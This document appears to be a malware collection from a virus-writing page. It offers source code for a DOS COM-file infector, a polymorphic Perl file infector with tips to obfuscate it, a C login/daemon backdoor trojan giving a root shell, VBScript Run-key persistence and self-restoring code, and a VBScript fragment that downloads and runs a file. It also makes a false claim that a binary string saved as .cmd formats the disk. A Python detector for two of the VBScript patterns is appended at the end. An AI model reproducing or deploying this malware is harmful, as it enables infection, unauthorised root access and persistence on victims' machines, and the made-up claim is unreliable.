Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret

CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0

OrgPrg: Int 20h
Nop
Nop

VirLen Equ $-MainVir


script virus source code
FileSystemObject","") tmp2=2 set tmp = F.GetSpecialFolder(tmp2) SS.open fname1= F.BuildPath(tmp,fname1) SS.write x.responseBody SS.savetofile fname1,2 SS.close call shellexe(zz,fname1)//////////////////////////test2.htmVBScript.

Poly Perl Virus
Ok, this is a polymorphic perl virus which is using EPO techniques,
To make this code useful strip the comments, remove linebreaks, and
obfuscate it .. ;)
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor

$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?

for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}

$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop

if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n";
# and start it

# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}


do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );


open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);


for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO


CloseFile:
close(File);
}}}}

$a = `rm $0`; # delete our selves..

Trojan Daemon[SJ]
Universal trojan ( login / imapd / qpopd )
But will work on more daemons and on most systems.
After installed on the system.
Telnet to the daemon and you will have 1 second to type in
the trojan passwd to get root access else it executes the real daemon.


( login / ipop3d / imapd trojan )
This is a combined login / ipop3d / imapd trojan.
* This should work with other daemons but I have only tested these 3
EAL == mv the real deamon to this path.
* TROJAN == This is the real path of the daemon, put the trojan here. It defaults to login trojan now.
* Don't forget you might have to the rights of the trojan.
* Telnet to the port whatever daemon it's set for.
* The passwd you need to enter in one second == door
* and you will get that lovely # =)
* This works on most systems.


#include
#include
#include
#include

#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "door"

char **execute;
char passwd[5];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;

scanf("%s",passwd);

if(strcmp(passwd,ROOT)==0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0);
}
else
{
execv(REAL,execute);
exit(0);
}
}


void connection()
{
execv(REAL,execute);
exit(0);
}

It's basically not a virus, but it will work like one.

01001011000111110010010101010101010000011111100000

Just save it in Notepad with the extension .cmd

and scan it with any antivirus; it will not be detected. But if opened, it will format the whole hard disk.

Startup Virus
With these two lines your worm will start with Windows.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯


Anti Deletion Virus
This function must be the last one called, because it never ends.
If it detects that the file has been deleted, it is created again.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
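
For triage of suspect .vbs files, the two behaviours above (a RegWrite into the Run key, and a script that reads and then re-creates its own file) can be flagged statically. This is an added example, not code from the original post; the rule names, the sample text and its value name and path are constructed for illustration.

```python
import re

# Heuristic rules (names are this example's own) for the two behaviours above.
RULES = {
    # RegWrite into an autostart Run/RunOnce key under HKLM or HKCU
    "run_key_persistence": re.compile(
        r'\.regwrite\s+"(?:HKLM|HKCU|HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)'
        r'\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\',
        re.I),
    # Script opens its own file (keeps a copy of its source in memory)
    "reads_own_source": re.compile(
        r'opentextfile\s*\(\s*wscript\.scriptfullname', re.I),
    # Script writes a file at its own path (re-creates itself)
    "rewrites_self": re.compile(
        r'createtextfile\s*\(\s*wscript\.scriptfullname', re.I),
}

def scan(text):
    """Return {rule_name: [1-based line numbers]} for each rule that matched."""
    hits = {}
    for no, line in enumerate(text.splitlines(), 1):
        code = line.strip()
        if code.startswith("'") or code.lower().startswith("rem "):
            continue  # skip VBScript comment lines
        for name, rx in RULES.items():
            if rx.search(code):
                hits.setdefault(name, []).append(no)
    return hits

def verdict(hits):
    """Combine rule hits into findings an analyst can triage."""
    findings = []
    if "run_key_persistence" in hits:
        findings.append("autostart")
    # Reading and re-creating its own file together is the anti-deletion pattern
    if {"reads_own_source", "rewrites_self"} <= set(hits):
        findings.append("self-restore")
    return findings

# Constructed sample input (value name and path are placeholders)
SAMPLE = r'''Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Example", "wscript.exe c:\example.vbs"
' ws.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Commented", "x"
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
Set Myself = fso.createtextfile(wscript.scriptfullname, True)'''

if __name__ == "__main__":
    print(scan(SAMPLE), verdict(scan(SAMPLE)))
```

A static match only shows the script contains these calls; confirm on the host by reviewing the values under the Run key and the file each one points to.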